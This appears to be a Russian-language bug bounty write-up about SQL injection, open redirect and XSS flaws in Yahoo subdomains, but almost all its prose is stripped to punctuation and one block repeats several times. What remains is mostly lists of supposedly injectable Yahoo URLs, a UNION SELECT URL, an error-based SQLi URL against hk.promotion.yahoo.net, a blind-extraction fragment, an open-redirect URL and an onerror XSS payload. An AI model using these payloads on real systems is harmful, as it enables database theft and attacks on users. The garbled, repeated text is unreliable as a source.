sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
